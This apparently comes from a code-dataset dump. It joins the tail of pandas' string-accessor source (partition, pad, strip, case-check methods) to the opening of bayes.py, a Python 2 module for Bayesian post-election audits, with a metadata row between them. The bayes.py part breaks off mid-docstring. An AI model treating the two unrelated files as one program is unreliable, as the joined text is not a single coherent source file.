result = str_rsplit(self._parent, pat, n=n)
return self._wrap_result(result, expand=expand)
_shared_docs[
"str_partition"
] = """
Split the string at the %(side)s occurrence of `sep`.
This method splits the string at the %(side)s occurrence of `sep`,
and returns 3 elements containing the part before the separator,
the separator itself, and the part after the separator.
If the separator is not found, return %(return)s.
Parameters
----------
sep : str, default whitespace
String to split on.
pat : str, default whitespace
.. deprecated:: 0.24.0
Use ``sep`` instead
expand : bool, default True
If True, return DataFrame/MultiIndex expanding dimensionality.
If False, return Series/Index.
Returns
-------
DataFrame/MultiIndex or Series/Index of objects
See Also
--------
%(also)s
Series.str.split : Split strings around given separators.
str.partition : Standard library version.
Examples
--------
>>> s = pd.Series(['Linda van der Berg', 'George Pitt-Rivers'])
>>> s
0 Linda van der Berg
1 George Pitt-Rivers
dtype: object
>>> s.str.partition()
0 1 2
0 Linda van der Berg
1 George Pitt-Rivers
To partition by the last space instead of the first one:
>>> s.str.rpartition()
0 1 2
0 Linda van der Berg
1 George Pitt-Rivers
To partition by something different than a space:
>>> s.str.partition('-')
0 1 2
0 Linda van der Berg
1 George Pitt - Rivers
To return a Series containing tuples instead of a DataFrame:
>>> s.str.partition('-', expand=False)
0 (Linda van der Berg, , )
1 (George Pitt, -, Rivers)
dtype: object
Also available on indices:
>>> idx = pd.Index(['X 123', 'Y 999'])
>>> idx
Index(['X 123', 'Y 999'], dtype='object')
Which will create a MultiIndex:
>>> idx.str.partition()
MultiIndex([('X', ' ', '123'),
('Y', ' ', '999')],
dtype='object')
Or an index with tuples with ``expand=False``:
>>> idx.str.partition(expand=False)
Index([('X', ' ', '123'), ('Y', ' ', '999')], dtype='object')
"""
@Appender(
_shared_docs["str_partition"]
% {
"side": "first",
"return": "3 elements containing the string itself, followed by two "
"empty strings",
"also": "rpartition : Split the string at the last occurrence of " "`sep`.",
}
)
@deprecate_kwarg(old_arg_name="pat", new_arg_name="sep")
@forbid_nonstring_types(["bytes"])
def partition(self, sep=" ", expand=True):
f = lambda x: x.partition(sep)
result = _na_map(f, self._parent)
return self._wrap_result(result, expand=expand)
@Appender(
_shared_docs["str_partition"]
% {
"side": "last",
"return": "3 elements containing two empty strings, followed by the "
"string itself",
"also": "partition : Split the string at the first occurrence of " "`sep`.",
}
)
@deprecate_kwarg(old_arg_name="pat", new_arg_name="sep")
@forbid_nonstring_types(["bytes"])
def rpartition(self, sep=" ", expand=True):
f = lambda x: x.rpartition(sep)
result = _na_map(f, self._parent)
return self._wrap_result(result, expand=expand)
@copy(str_get)
def get(self, i):
result = str_get(self._parent, i)
return self._wrap_result(result)
@copy(str_join)
@forbid_nonstring_types(["bytes"])
def join(self, sep):
result = str_join(self._parent, sep)
return self._wrap_result(result)
@copy(str_contains)
@forbid_nonstring_types(["bytes"])
def contains(self, pat, case=True, flags=0, na=np.nan, regex=True):
result = str_contains(
self._parent, pat, case=case, flags=flags, na=na, regex=regex
)
return self._wrap_result(result, fill_value=na)
@copy(str_match)
@forbid_nonstring_types(["bytes"])
def match(self, pat, case=True, flags=0, na=np.nan):
result = str_match(self._parent, pat, case=case, flags=flags, na=na)
return self._wrap_result(result, fill_value=na)
@copy(str_replace)
@forbid_nonstring_types(["bytes"])
def replace(self, pat, repl, n=-1, case=None, flags=0, regex=True):
result = str_replace(
self._parent, pat, repl, n=n, case=case, flags=flags, regex=regex
)
return self._wrap_result(result)
@copy(str_repeat)
@forbid_nonstring_types(["bytes"])
def repeat(self, repeats):
result = str_repeat(self._parent, repeats)
return self._wrap_result(result)
@copy(str_pad)
@forbid_nonstring_types(["bytes"])
def pad(self, width, side="left", fillchar=" "):
result = str_pad(self._parent, width, side=side, fillchar=fillchar)
return self._wrap_result(result)
_shared_docs[
"str_pad"
] = """
Filling %(side)s side of strings in the Series/Index with an
additional character. Equivalent to :meth:`str.%(method)s`.
Parameters
----------
width : int
Minimum width of resulting string; additional characters will be filled
with ``fillchar``
fillchar : str
Additional character for filling, default is whitespace
Returns
-------
filled : Series/Index of objects
"""
@Appender(_shared_docs["str_pad"] % dict(side="left and right", method="center"))
@forbid_nonstring_types(["bytes"])
def center(self, width, fillchar=" "):
return self.pad(width, side="both", fillchar=fillchar)
@Appender(_shared_docs["str_pad"] % dict(side="right", method="ljust"))
@forbid_nonstring_types(["bytes"])
def ljust(self, width, fillchar=" "):
return self.pad(width, side="right", fillchar=fillchar)
@Appender(_shared_docs["str_pad"] % dict(side="left", method="rjust"))
@forbid_nonstring_types(["bytes"])
def rjust(self, width, fillchar=" "):
return self.pad(width, side="left", fillchar=fillchar)
@forbid_nonstring_types(["bytes"])
def zfill(self, width):
"""
Pad strings in the Series/Index by prepending '0' characters.
Strings in the Series/Index are padded with '0' characters on the
left of the string to reach a total string length `width`. Strings
in the Series/Index with length greater or equal to `width` are
unchanged.
Parameters
----------
width : int
Minimum length of resulting string; strings with length less
than `width` be prepended with '0' characters.
Returns
-------
Series/Index of objects
See Also
--------
Series.str.rjust : Fills the left side of strings with an arbitrary
character.
Series.str.ljust : Fills the right side of strings with an arbitrary
character.
Series.str.pad : Fills the specified sides of strings with an arbitrary
character.
Series.str.center : Fills boths sides of strings with an arbitrary
character.
Notes
-----
Differs from :meth:`str.zfill` which has special handling
for '+'/'-' in the string.
Examples
--------
>>> s = pd.Series(['-1', '1', '1000', 10, np.nan])
>>> s
0 -1
1 1
2 1000
3 10
4 NaN
dtype: object
Note that ``10`` and ``NaN`` are not strings, therefore they are
converted to ``NaN``. The minus sign in ``'-1'`` is treated as a
regular character and the zero is added to the left of it
(:meth:`str.zfill` would have moved it to the left). ``1000``
remains unchanged as it is longer than `width`.
>>> s.str.zfill(3)
0 0-1
1 001
2 1000
3 NaN
4 NaN
dtype: object
"""
result = str_pad(self._parent, width, side="left", fillchar="0")
return self._wrap_result(result)
@copy(str_slice)
def slice(self, start=None, stop=None, step=None):
result = str_slice(self._parent, start, stop, step)
return self._wrap_result(result)
@copy(str_slice_replace)
@forbid_nonstring_types(["bytes"])
def slice_replace(self, start=None, stop=None, repl=None):
result = str_slice_replace(self._parent, start, stop, repl)
return self._wrap_result(result)
@copy(str_decode)
def decode(self, encoding, errors="strict"):
# need to allow bytes here
result = str_decode(self._parent, encoding, errors)
return self._wrap_result(result)
@copy(str_encode)
@forbid_nonstring_types(["bytes"])
def encode(self, encoding, errors="strict"):
result = str_encode(self._parent, encoding, errors)
return self._wrap_result(result)
_shared_docs[
"str_strip"
] = r"""
Remove leading and trailing characters.
Strip whitespaces (including newlines) or a set of specified characters
from each string in the Series/Index from %(side)s.
Equivalent to :meth:`str.%(method)s`.
Parameters
----------
to_strip : str or None, default None
Specifying the set of characters to be removed.
All combinations of this set of characters will be stripped.
If None then whitespaces are removed.
Returns
-------
Series/Index of objects
See Also
--------
Series.str.strip : Remove leading and trailing characters in Series/Index.
Series.str.lstrip : Remove leading characters in Series/Index.
Series.str.rstrip : Remove trailing characters in Series/Index.
Examples
--------
>>> s = pd.Series(['1. Ant. ', '2. Bee!\n', '3. Cat?\t', np.nan])
>>> s
0 1. Ant.
1 2. Bee!\n
2 3. Cat?\t
3 NaN
dtype: object
>>> s.str.strip()
0 1. Ant.
1 2. Bee!
2 3. Cat?
3 NaN
dtype: object
>>> s.str.lstrip('123.')
0 Ant.
1 Bee!\n
2 Cat?\t
3 NaN
dtype: object
>>> s.str.rstrip('.!? \n\t')
0 1. Ant
1 2. Bee
2 3. Cat
3 NaN
dtype: object
>>> s.str.strip('123.!? \n\t')
0 Ant
1 Bee
2 Cat
3 NaN
dtype: object
"""
@Appender(
_shared_docs["str_strip"] % dict(side="left and right sides", method="strip")
)
@forbid_nonstring_types(["bytes"])
def strip(self, to_strip=None):
result = str_strip(self._parent, to_strip, side="both")
return self._wrap_result(result)
@Appender(_shared_docs["str_strip"] % dict(side="left side", method="lstrip"))
@forbid_nonstring_types(["bytes"])
def lstrip(self, to_strip=None):
result = str_strip(self._parent, to_strip, side="left")
return self._wrap_result(result)
@Appender(_shared_docs["str_strip"] % dict(side="right side", method="rstrip"))
@forbid_nonstring_types(["bytes"])
def rstrip(self, to_strip=None):
result = str_strip(self._parent, to_strip, side="right")
return self._wrap_result(result)
@copy(str_wrap)
@forbid_nonstring_types(["bytes"])
def wrap(self, width, **kwargs):
result = str_wrap(self._parent, width, **kwargs)
return self._wrap_result(result)
@copy(str_get_dummies)
@forbid_nonstring_types(["bytes"])
def get_dummies(self, sep="|"):
# we need to cast to Series of strings as only that has all
# methods available for making the dummies...
data = self._orig.astype(str) if self._is_categorical else self._parent
result, name = str_get_dummies(data, sep)
return self._wrap_result(
result, use_codes=(not self._is_categorical), name=name, expand=True
)
@copy(str_translate)
@forbid_nonstring_types(["bytes"])
def translate(self, table):
result = str_translate(self._parent, table)
return self._wrap_result(result)
count = _pat_wrapper(str_count, flags=True, name="count")
startswith = _pat_wrapper(str_startswith, na=True, name="startswith")
endswith = _pat_wrapper(str_endswith, na=True, name="endswith")
findall = _pat_wrapper(str_findall, flags=True, name="findall")
@copy(str_extract)
@forbid_nonstring_types(["bytes"])
def extract(self, pat, flags=0, expand=True):
return str_extract(self, pat, flags=flags, expand=expand)
@copy(str_extractall)
@forbid_nonstring_types(["bytes"])
def extractall(self, pat, flags=0):
return str_extractall(self._orig, pat, flags=flags)
_shared_docs[
"find"
] = """
Return %(side)s indexes in each strings in the Series/Index
where the substring is fully contained between [start:end].
Return -1 on failure. Equivalent to standard :meth:`str.%(method)s`.
Parameters
----------
sub : str
Substring being searched
start : int
Left edge index
end : int
Right edge index
Returns
-------
found : Series/Index of integer values
See Also
--------
%(also)s
"""
@Appender(
_shared_docs["find"]
% dict(
side="lowest",
method="find",
also="rfind : Return highest indexes in each strings.",
)
)
@forbid_nonstring_types(["bytes"])
def find(self, sub, start=0, end=None):
result = str_find(self._parent, sub, start=start, end=end, side="left")
return self._wrap_result(result)
@Appender(
_shared_docs["find"]
% dict(
side="highest",
method="rfind",
also="find : Return lowest indexes in each strings.",
)
)
@forbid_nonstring_types(["bytes"])
def rfind(self, sub, start=0, end=None):
result = str_find(self._parent, sub, start=start, end=end, side="right")
return self._wrap_result(result)
@forbid_nonstring_types(["bytes"])
def normalize(self, form):
"""
Return the Unicode normal form for the strings in the Series/Index.
For more information on the forms, see the
:func:`unicodedata.normalize`.
Parameters
----------
form : {'NFC', 'NFKC', 'NFD', 'NFKD'}
Unicode form
Returns
-------
normalized : Series/Index of objects
"""
import unicodedata
f = lambda x: unicodedata.normalize(form, x)
result = _na_map(f, self._parent)
return self._wrap_result(result)
_shared_docs[
"index"
] = """
Return %(side)s indexes in each strings where the substring is
fully contained between [start:end]. This is the same as
``str.%(similar)s`` except instead of returning -1, it raises a ValueError
when the substring is not found. Equivalent to standard ``str.%(method)s``.
Parameters
----------
sub : str
Substring being searched
start : int
Left edge index
end : int
Right edge index
Returns
-------
found : Series/Index of objects
See Also
--------
%(also)s
"""
@Appender(
_shared_docs["index"]
% dict(
side="lowest",
similar="find",
method="index",
also="rindex : Return highest indexes in each strings.",
)
)
@forbid_nonstring_types(["bytes"])
def index(self, sub, start=0, end=None):
result = str_index(self._parent, sub, start=start, end=end, side="left")
return self._wrap_result(result)
@Appender(
_shared_docs["index"]
% dict(
side="highest",
similar="rfind",
method="rindex",
also="index : Return lowest indexes in each strings.",
)
)
@forbid_nonstring_types(["bytes"])
def rindex(self, sub, start=0, end=None):
result = str_index(self._parent, sub, start=start, end=end, side="right")
return self._wrap_result(result)
_shared_docs[
"len"
] = """
Compute the length of each element in the Series/Index. The element may be
a sequence (such as a string, tuple or list) or a collection
(such as a dictionary).
Returns
-------
Series or Index of int
A Series or Index of integer values indicating the length of each
element in the Series or Index.
See Also
--------
str.len : Python built-in function returning the length of an object.
Series.size : Returns the length of the Series.
Examples
--------
Returns the length (number of characters) in a string. Returns the
number of entries for dictionaries, lists or tuples.
>>> s = pd.Series(['dog',
... '',
... 5,
... {'foo' : 'bar'},
... [2, 3, 5, 7],
... ('one', 'two', 'three')])
>>> s
0 dog
1
2 5
3 {'foo': 'bar'}
4 [2, 3, 5, 7]
5 (one, two, three)
dtype: object
>>> s.str.len()
0 3.0
1 0.0
2 NaN
3 1.0
4 4.0
5 3.0
dtype: float64
"""
len = _noarg_wrapper(
len, docstring=_shared_docs["len"], forbidden_types=None, dtype=int
)
_shared_docs[
"casemethods"
] = """
Convert strings in the Series/Index to %(type)s.
%(version)s
Equivalent to :meth:`str.%(method)s`.
Returns
-------
Series/Index of objects
See Also
--------
Series.str.lower : Converts all characters to lowercase.
Series.str.upper : Converts all characters to uppercase.
Series.str.title : Converts first character of each word to uppercase and
remaining to lowercase.
Series.str.capitalize : Converts first character to uppercase and
remaining to lowercase.
Series.str.swapcase : Converts uppercase to lowercase and lowercase to
uppercase.
Series.str.casefold: Removes all case distinctions in the string.
Examples
--------
>>> s = pd.Series(['lower', 'CAPITALS', 'this is a sentence', 'SwApCaSe'])
>>> s
0 lower
1 CAPITALS
2 this is a sentence
3 SwApCaSe
dtype: object
>>> s.str.lower()
0 lower
1 capitals
2 this is a sentence
3 swapcase
dtype: object
>>> s.str.upper()
0 LOWER
1 CAPITALS
2 THIS IS A SENTENCE
3 SWAPCASE
dtype: object
>>> s.str.title()
0 Lower
1 Capitals
2 This Is A Sentence
3 Swapcase
dtype: object
>>> s.str.capitalize()
0 Lower
1 Capitals
2 This is a sentence
3 Swapcase
dtype: object
>>> s.str.swapcase()
0 LOWER
1 capitals
2 THIS IS A SENTENCE
3 sWaPcAsE
dtype: object
"""
# _doc_args holds dict of strings to use in substituting casemethod docs
_doc_args = {} # type: Dict[str, Dict[str, str]]
_doc_args["lower"] = dict(type="lowercase", method="lower", version="")
_doc_args["upper"] = dict(type="uppercase", method="upper", version="")
_doc_args["title"] = dict(type="titlecase", method="title", version="")
_doc_args["capitalize"] = dict(
type="be capitalized", method="capitalize", version=""
)
_doc_args["swapcase"] = dict(type="be swapcased", method="swapcase", version="")
_doc_args["casefold"] = dict(
type="be casefolded",
method="casefold",
version="\n .. versionadded:: 0.25.0\n",
)
lower = _noarg_wrapper(
lambda x: x.lower(),
name="lower",
docstring=_shared_docs["casemethods"] % _doc_args["lower"],
)
upper = _noarg_wrapper(
lambda x: x.upper(),
name="upper",
docstring=_shared_docs["casemethods"] % _doc_args["upper"],
)
title = _noarg_wrapper(
lambda x: x.title(),
name="title",
docstring=_shared_docs["casemethods"] % _doc_args["title"],
)
capitalize = _noarg_wrapper(
lambda x: x.capitalize(),
name="capitalize",
docstring=_shared_docs["casemethods"] % _doc_args["capitalize"],
)
swapcase = _noarg_wrapper(
lambda x: x.swapcase(),
name="swapcase",
docstring=_shared_docs["casemethods"] % _doc_args["swapcase"],
)
casefold = _noarg_wrapper(
lambda x: x.casefold(),
name="casefold",
docstring=_shared_docs["casemethods"] % _doc_args["casefold"],
)
_shared_docs[
"ismethods"
] = """
Check whether all characters in each string are %(type)s.
This is equivalent to running the Python string method
:meth:`str.%(method)s` for each element of the Series/Index. If a string
has zero characters, ``False`` is returned for that check.
Returns
-------
Series or Index of bool
Series or Index of boolean values with the same length as the original
Series/Index.
See Also
--------
Series.str.isalpha : Check whether all characters are alphabetic.
Series.str.isnumeric : Check whether all characters are numeric.
Series.str.isalnum : Check whether all characters are alphanumeric.
Series.str.isdigit : Check whether all characters are digits.
Series.str.isdecimal : Check whether all characters are decimal.
Series.str.isspace : Check whether all characters are whitespace.
Series.str.islower : Check whether all characters are lowercase.
Series.str.isupper : Check whether all characters are uppercase.
Series.str.istitle : Check whether all characters are titlecase.
Examples
--------
**Checks for Alphabetic and Numeric Characters**
>>> s1 = pd.Series(['one', 'one1', '1', ''])
>>> s1.str.isalpha()
0 True
1 False
2 False
3 False
dtype: bool
>>> s1.str.isnumeric()
0 False
1 False
2 True
3 False
dtype: bool
>>> s1.str.isalnum()
0 True
1 True
2 True
3 False
dtype: bool
Note that checks against characters mixed with any additional punctuation
or whitespace will evaluate to false for an alphanumeric check.
>>> s2 = pd.Series(['A B', '1.5', '3,000'])
>>> s2.str.isalnum()
0 False
1 False
2 False
dtype: bool
**More Detailed Checks for Numeric Characters**
There are several different but overlapping sets of numeric characters that
can be checked for.
>>> s3 = pd.Series(['23', '³', '⅕', ''])
The ``s3.str.isdecimal`` method checks for characters used to form numbers
in base 10.
>>> s3.str.isdecimal()
0 True
1 False
2 False
3 False
dtype: bool
The ``s.str.isdigit`` method is the same as ``s3.str.isdecimal`` but also
includes special digits, like superscripted and subscripted digits in
unicode.
>>> s3.str.isdigit()
0 True
1 True
2 False
3 False
dtype: bool
The ``s.str.isnumeric`` method is the same as ``s3.str.isdigit`` but also
includes other characters that can represent quantities such as unicode
fractions.
>>> s3.str.isnumeric()
0 True
1 True
2 True
3 False
dtype: bool
**Checks for Whitespace**
>>> s4 = pd.Series([' ', '\\t\\r\\n ', ''])
>>> s4.str.isspace()
0 True
1 True
2 False
dtype: bool
**Checks for Character Case**
>>> s5 = pd.Series(['leopard', 'Golden Eagle', 'SNAKE', ''])
>>> s5.str.islower()
0 True
1 False
2 False
3 False
dtype: bool
>>> s5.str.isupper()
0 False
1 False
2 True
3 False
dtype: bool
The ``s5.str.istitle`` method checks for whether all words are in title
case (whether only the first letter of each word is capitalized). Words are
assumed to be as any sequence of non-numeric characters separated by
whitespace characters.
>>> s5.str.istitle()
0 False
1 True
2 False
3 False
dtype: bool
"""
_doc_args["isalnum"] = dict(type="alphanumeric", method="isalnum")
_doc_args["isalpha"] = dict(type="alphabetic", method="isalpha")
_doc_args["isdigit"] = dict(type="digits", method="isdigit")
_doc_args["isspace"] = dict(type="whitespace", method="isspace")
_doc_args["islower"] = dict(type="lowercase", method="islower")
_doc_args["isupper"] = dict(type="uppercase", method="isupper")
_doc_args["istitle"] = dict(type="titlecase", method="istitle")
_doc_args["isnumeric"] = dict(type="numeric", method="isnumeric")
_doc_args["isdecimal"] = dict(type="decimal", method="isdecimal")
isalnum = _noarg_wrapper(
lambda x: x.isalnum(),
name="isalnum",
docstring=_shared_docs["ismethods"] % _doc_args["isalnum"],
)
isalpha = _noarg_wrapper(
lambda x: x.isalpha(),
name="isalpha",
docstring=_shared_docs["ismethods"] % _doc_args["isalpha"],
)
isdigit = _noarg_wrapper(
lambda x: x.isdigit(),
name="isdigit",
docstring=_shared_docs["ismethods"] % _doc_args["isdigit"],
)
isspace = _noarg_wrapper(
lambda x: x.isspace(),
name="isspace",
docstring=_shared_docs["ismethods"] % _doc_args["isspace"],
)
islower = _noarg_wrapper(
lambda x: x.islower(),
name="islower",
docstring=_shared_docs["ismethods"] % _doc_args["islower"],
)
isupper = _noarg_wrapper(
lambda x: x.isupper(),
name="isupper",
docstring=_shared_docs["ismethods"] % _doc_args["isupper"],
)
istitle = _noarg_wrapper(
lambda x: x.istitle(),
name="istitle",
docstring=_shared_docs["ismethods"] % _doc_args["istitle"],
)
isnumeric = _noarg_wrapper(
lambda x: x.isnumeric(),
name="isnumeric",
docstring=_shared_docs["ismethods"] % _doc_args["isnumeric"],
)
isdecimal = _noarg_wrapper(
lambda x: x.isdecimal(),
name="isdecimal",
docstring=_shared_docs["ismethods"] % _doc_args["isdecimal"],
)
@classmethod
def _make_accessor(cls, data):
cls._validate(data)
return cls(data)
| apache-2.0 | -8,466,611,931,052,144,000 | 29.541679 | 88 | 0.565437 | false | 3.99698 | false | false | false |
ron-rivest/2017-bayes-audit | from-2012-bayes-audit/bayes.py | 1 | 21492 | # bayes.py
# Code for working with Bayes Post-Election Audits
# Ronald L. Rivest and Emily Shen
# 5/31/12
"""
----------------------------------------------------------------------
This code available under "MIT License" (open source).
Copyright (C) 2012 Ronald L. Rivest and Emily Shen.
Permission is hereby granted, free of charge, to any person obtaining
a copy of this software and associated documentation files (the
"Software"), to deal in the Software without restriction, including
without limitation the rights to use, copy, modify, merge, publish,
distribute, sublicense, and/or sell copies of the Software, and to
permit persons to whom the Software is furnished to do so, subject to
the following conditions:
The above copyright notice and this permission notice shall be
included in all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE
LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION
OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION
WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
----------------------------------------------------------------------
"""
"""
Notation:
Even though Python is 0-indexed, we'll use one-indexing here, to
correspond better with our paper. The 0-th element of lists (arrays)
will be ignored (and is typically set to a dummy(-9)).
m -- the number of candidates (for plurality elections)
t -- the number of distinct ballot types possible resulting from
a machine scan or hand examination of a ballot.
One may consider "undervote" and "overvote" to be
ballot types (although they shouldn't win), in
which case we havve t = m+2 for a plurality election.
The ballot types are coded as integers: 1, ..., t.
n -- the number of ballots cast.
r[1..n] -- the list of all the *reported* ballot types.
This is the "reported profile" for the election.
That is, r[i] is the ``machine result'' for ballot i.
a[1..n] -- the list of all the corresponding *actual* ballot types.
This is the "actual profile" for the election.
That is, a[i] is the ``hand audit result'' for ballot i.
In practice, these become known only one at a time,
as audited, instead of all at once, as coded here.
s -- the size of the current sample (the number of ballots
audited so far).
epsilon -- the provided ``upset risk limit'' (e.g. 0.05)
"""
######################################################################
# Reminder: this code runs about 7x faster with "pypy" than with
# the standard python interpreter ! Use pypy!
######################################################################
import math
import random
import string
import time
dummy = -9 # dummy value for array position 0
######################################################################
# TALLY
######################################################################
def tally(P,t):
"""
Return list of counts of each ballot type in profile P.
Assumes each entry of P[1:] is in 1...t, inclusive.
P is 0-indexed; dummy value P[0] is ignored.
returned count[j] is number of votes of type j, 1<=j<=t.
returned count[0] is a dummy value.
"""
count = [dummy]+[0]*t
for i in range(1,len(P)):
count[P[i]] += 1
return count
######################################################################
# SOCIAL CHOICE FUNCTION
######################################################################
"""
The social choice function that returns an election outcome for a
given profile with the tally results that are given in count[1..t].
The election outcome is typically an integer
(e.g. the most common ballot type), but can be any arbitrary
Python object that can be compared for equality.
There are many ways this routine could be coded, depending on the
choice of voting system; any (deterministic) voting system could
be used.
For our purposes, it is important that the social choice function f be
well-defined even for non-integer counts, since our Dirichlet
approximations will give non-integral values. This is OK, since
almost all voting systems are based on comparing vote totals of
various sorts, and integrality of vote totals is not required.
In practice, one may want to disallow "undervote" and "overvote" from
winning, if they are ballot types. This may be accomplished by
supplying an extra (optional) argument to f, a dictionary that
supplies additional parameters and information to f (in a way
that may depend on f, of course). See the example for plurality
below.
"""
def f_plurality(count,params=None):
"""
A simple example social choice function -- plurality elections.
Here we assume that the most common ballot type "wins", with
ties broken in favor of the lower-numbered outcome.
If params is supplied to f_plurality, it should be a dict such that
params['invalid'] is a list of outcomes that are not be allowed to win.
For example, f(count,{'invalid':[1]}) will not allow outcome 1.
You can use closures to get the desired binding of params in
social choice function, e.g.
g = lambda count: f_plurality(count,{'invalid',[1]})
defines social choice function g that embeds the desired params
into f_plurality; g only takes count as an argument (the params
are now implicit).
"""
t = len(count)-1
if params != None:
invalid_list = params.get('invalid',[])
else:
invalid_list = []
outcome = 1
while outcome < t and outcome in invalid_list:
outcome += 1
for j in xrange(outcome+1,t+1):
if count[j]>count[outcome] and outcome not in invalid_list:
outcome = j
return outcome
def test_f_plurality():
"""
Simple test routine for social choice function f_plurality.
"""
P = [dummy]+[1, 1, 2, 0, 3, 1, 2]
t = 3
print "profile", P[1:]
count = tally(P,t)
print "outcome = ", f_plurality(count)
# ==> 1
P = [dummy]+[1, 2, 1, 2, 3, 4, 6]
print P[1:]
t = 6
count = tally(P,t)
print "outcome = ", f_plurality(count,{'invalid':[1]})
# ==> 2
# test_f_plurality()
######################################################################
# MAKE LIST OF HYPERPARAMETER MATRICES OR VECTORS
######################################################################
def make_prior_list(audit_type,t,ballot_polling):
"""
return list of t x t prior matrices if comparison audit
return list of t prior vectors if ballot-polling audit
audit_type is one of (where c is an integer):
"N" -- non partisan (uniform) all hyperparameters = 1 (same as N1)
"Nc" -- non partisan (uniform) all hyperparameters = c
"P" -- partisan: list of t matrices each all zeros except one column = to 1 (same as P1)
"Pc" -- partisan: list of t matrices each all zeros except one column = to c
"NP" -- N union P
"NPc" -- Nc union Pc
Each matrix is t x t with integer entries (with dummy entries to account for 0-indexing of lists).
"""
prior_list = [ ]
c_digits = [ d for d in audit_type if d in string.digits ]
if c_digits != [ ] :
c = int(string.join(c_digits,sep=""))
else:
c = 1
if not ballot_polling:
if "N" in audit_type:
prior_list += [ [dummy] +
[ [dummy]+[c]*t for j in xrange(1,t+1) ] # just one matrix, c's everywhere
]
if "P" in audit_type:
prior_list += [ [dummy] + [ [dummy]+[0]*(k-1) + [c] + [0]*(t-k) for j in xrange(1,t+1) ] # one for each type k
for k in xrange(1,t+1)
]
else: # ballot polling
if "N" in audit_type:
prior_list += [ [dummy] + [c]*t ] # just one vector of all c's
if "P" in audit_type:
prior_list += [ [dummy]+[0]*(k-1) + [c] + [0]*(t-k) # one for each type k
for k in xrange(1,t+1)
]
return prior_list
# print make_prior_list("N2",3,True)
# --> [[-9, 2, 2, 2]]
# print make_prior_list("P2",3,True)
# --> [[-9, 2, 0, 0], [-9, 0, 2, 0], [-9, 0, 0, 2]]
# print make_prior_list("N2",3,False)
# --> [ [-9, [-9, 2, 2, 2], [-9, 2, 2, 2], [-9, 2, 2, 2]] ]
# print make_prior_list("P2",3,False)
# --> [ [-9, [-9, 2, 0, 0], [-9, 2, 0, 0], [-9, 2, 0, 0]],
# [-9, [-9, 0, 2, 0], [-9, 0, 2, 0], [-9, 0, 2, 0]],
# [-9, [-9, 0, 0, 2], [-9, 0, 0, 2], [-9, 0, 0, 2]]]
######################################################################
# MAKE AUDITING SCHEDULE
######################################################################
def make_schedule(n,pattern):
"""
Make up an auditing schedule (a list of sample size s values to use)
start with 0
do pattern, then pattern repeated by multipied by last/first, etc.
end with n
note that last/first does not need to be an integer.
make_schedule(1000,[1,2]) # --> 0,1,2,4,8,16,32,64,128,256,512,1000
make_schedule(1000,[1,2,5,10]) # --> 0,1,2,5,10,20,50,100,200,500,1000
make_schedule(1000,[5,6]) # --> 0,5,6,7,8,10,12,14,17,21,25,30,37,44,53,64,77,...
"""
schedule = [ 0 ]
multiplier = 1
next_s = 1
while schedule[-1] < n:
for x in pattern:
next_s = int(x*multiplier)
next_s = min(n,next_s)
if next_s > schedule[-1]:
schedule.append(next_s)
multiplier *= float(pattern[-1])/float(pattern[0])
return schedule
######################################################################
# AUDIT (top-level dispatch function)
######################################################################
audit_method = "dirichlet" # switch to control dispatch
# alternative is "polya"
def audit(r,a,t,epsilon,schedule,printing_wanted=True,ballot_polling=False,f=f_plurality,audit_type="N"):
"""
Audit the election, given reported ballot types (r), actual
ballot types (a), and an upset probability limit (epsilon).
Each ballot type should be an integer in the range 1 to t (incl.)
ballot_polling=True if we want a ballot-polling audit.
f is the social choice function (defaults to plurality among ballot types)
Assumes the ballots already in some "random order"
r[0] and a[0] are ignored; only r[1..n] and a[1..n] are considered.
t = number of ballot types possible (numbered 1...t, inclusive)
audit_type is one of (where c is an integer) (default is "N"):
"N" -- non partisan (uniform) all hyperparameters = 1 (same as N1)
"Nc" -- non partisan (uniform) all hyperparameters = c
"P" -- partisan: list of t matrices each all zeros except one column = to 1 (same as P1)
"Pc" -- partisan: list of t matrices each all zeros except one column = to c
"NP" -- N union P
"NPc" -- Nc union Pc
The audit stops when upset probability is at most epsilon for *all* priors in list.
returns (result, s)
where result=="OK" if the reported outcome seems OK, else result=="NOT OK"
and where s == number of ballots examined.
"""
n = len(r)-1 # number of ballots in r
assert len(r) == len(a) # should have the same length
assert min(r[1:]) >= 1
assert max(r[1:]) <= t
assert min(a[1:]) >= 1
assert max(a[1:]) <= t
if audit_method == "dirichlet":
return audit_dirichlet(r,a,t,epsilon,schedule,printing_wanted,ballot_polling,f,audit_type)
elif audit_method == "polya":
import polya
return polya.audit_polya(r,a,t,epsilon,schedule,printing_wanted,ballot_polling,f,audit_type)
else:
print "In audit(): illegal audit_method specification:",audit_method
quit()
######################################################################
# DIRICHLET DISTRIBUTION
######################################################################
def dirichlet(alphas,n):
"""
Sample from a Dirichlet distribution.
return n times a Dirichlet random variable generated according to the given alphas.
note that alphas[0] is dummy to be ignored.
ignores alphas that are 0 (i.e. generates a zero component here)
returns vector x of same length as alphas
"""
# print "alphas",alphas
t = len(alphas)-1
x = [dummy] + [0.0]*t
sumx = 0.0
for k in xrange(1,t+1):
if alphas[k]>0.0:
x[k] = random.gammavariate(alphas[k],1)
sumx += x[k]
assert sumx > 0.0
for k in xrange(1,t+1):
x[k] = n * x[k] / sumx
return x
######################################################################
# AUDIT USING DIRICHLET DISTRIBUTION
######################################################################
def audit_dirichlet(r,a,t,epsilon,schedule,printing_wanted=True,ballot_polling=False,f=f_plurality,audit_type="N"):
"""
Audit the election, given reported ballot types (r), actual
ballot types (a), and an upset probability limit (epsilon)
Each ballot type should be an integer in the range 1 to t (incl.)
Assumes the ballots already in some "random order"
r[0] and a[0] are ignored; only r[1..n] and a[1..n] are considered.
t = number of ballot types possible (numbered 1...t, inclusive)
ballot_polling=True if we want a ballot_polling audit (then r is ignored)
f is the social choice function (defaults to plurality among ballot types)
audit_type is one of (where c is an integer):
"N" -- non partisan (uniform) all hyperparameters = 1 (same as N1)
"Nc" -- non partisan (uniform) all hyperparameters = c
"P" -- partisan: list of t matrices each all zeros except one column = to 1 (same as P1)
"Pc" -- partisan: list of t matrices each all zeros except one column = to c
